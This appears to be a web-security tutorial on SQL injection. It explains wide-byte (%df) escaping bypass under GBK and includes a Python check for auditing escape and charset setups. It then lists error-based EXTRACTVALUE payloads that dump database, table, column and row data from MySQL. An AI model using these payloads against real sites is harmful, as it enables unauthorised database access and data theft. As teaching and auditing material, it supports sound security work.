Wide Byte Injection
For some wide-byte charsets, such as GBK and GB2312, special characters (characters other than English letters) are two bytes long. So we can prevent the quotation mark (`'`) from being escaped by adding `%df` in front of it: the backslash that is meant to escape the single quotation mark is then treated as the second byte of a special character, combined with `%df`.
For instance, take the original string `admin'`. After processing by `addslashes()` in PHP it becomes `admin\'`. If we instead send `admin%df'`, it is escaped to `admin%df\'`, and the `%df` and `\` are combined into one wide-byte character. So we now have a single quotation mark that is not escaped.
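To see why the backslash disappears, here is an added Python check (not code from the original post) that mimics PHP's byte-level `addslashes()` and reports whether a bare quote survives after the bytes are decoded under a given charset. It is useful for auditing an escape-function/connection-charset combination; the helper names other than `addslashes` are hypothetical, and the inputs are constructed from the text above.

```python
# Added example (not from the original post): mimic PHP's byte-level addslashes()
# and test whether a bare quote survives once the bytes are decoded under a charset.
# Helper names here are hypothetical; only addslashes() mirrors a real PHP function.

PHP_ESCAPED = b"'\"\\\x00"  # bytes that addslashes() prefixes with a backslash


def addslashes(raw: bytes) -> bytes:
    """Byte-level escape, charset-unaware, like PHP addslashes()."""
    out = bytearray()
    for b in raw:
        if b in PHP_ESCAPED:
            out.append(0x5C)  # backslash
        out.append(b)
    return bytes(out)


def bare_quote_survives(raw: bytes, charset: str) -> bool:
    """True if, after addslashes(), decoding under `charset` yields a single
    quote that is NOT preceded by a literal backslash, i.e. the backslash was
    absorbed as the trail byte of a multibyte character."""
    text = addslashes(raw).decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


def audit(samples, charsets):
    """Return {(sample, charset): survives} for a quick review of an escaping setup."""
    return {(s, c): bare_quote_survives(s, c) for s in samples for c in charsets}


if __name__ == "__main__":
    # Constructed inputs: the plain value and the wide-byte variant from the text.
    results = audit([b"admin'", b"admin\xdf'"], ["gbk", "utf-8"])
    for (sample, charset), bad in results.items():
        print(f"{sample!r:18} {charset:6} bare quote survives: {bad}")
```

Under GBK the `\xdf\x5c` pair decodes to one character and the quote is bare; under UTF-8 the stray `\xdf` becomes a replacement character and the backslash still protects the quote, which is why the connection charset matters as much as the escaping function (and why parameterised queries avoid the problem entirely).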
Error Injection
Description
Use the `EXTRACTVALUE` function to get sensitive information from the target database. The principle: `EXTRACTVALUE(xml_code_or_file, xpath)` displays the content of the `xpath` parameter in its error message when the XPath syntax is invalid. So you can use a symbol that makes the XPath syntax invalid, such as `~` (or its hex form `0x7e`).
Common Usage
- View name of database:

```sql
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT DATABASE())))
```

- View names of tables:

```sql
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())))
```

- View names of columns:

```sql
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name="table_name")))
```

- View data of table (replace `column_name` and `table_name` with the names found above):

```sql
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(column_name) FROM table_name)))
```
Attention
The maximum length of the result shown by `EXTRACTVALUE` is 32 characters, so `SUBSTR()` or `LIMIT` should be used when the output is longer than 32.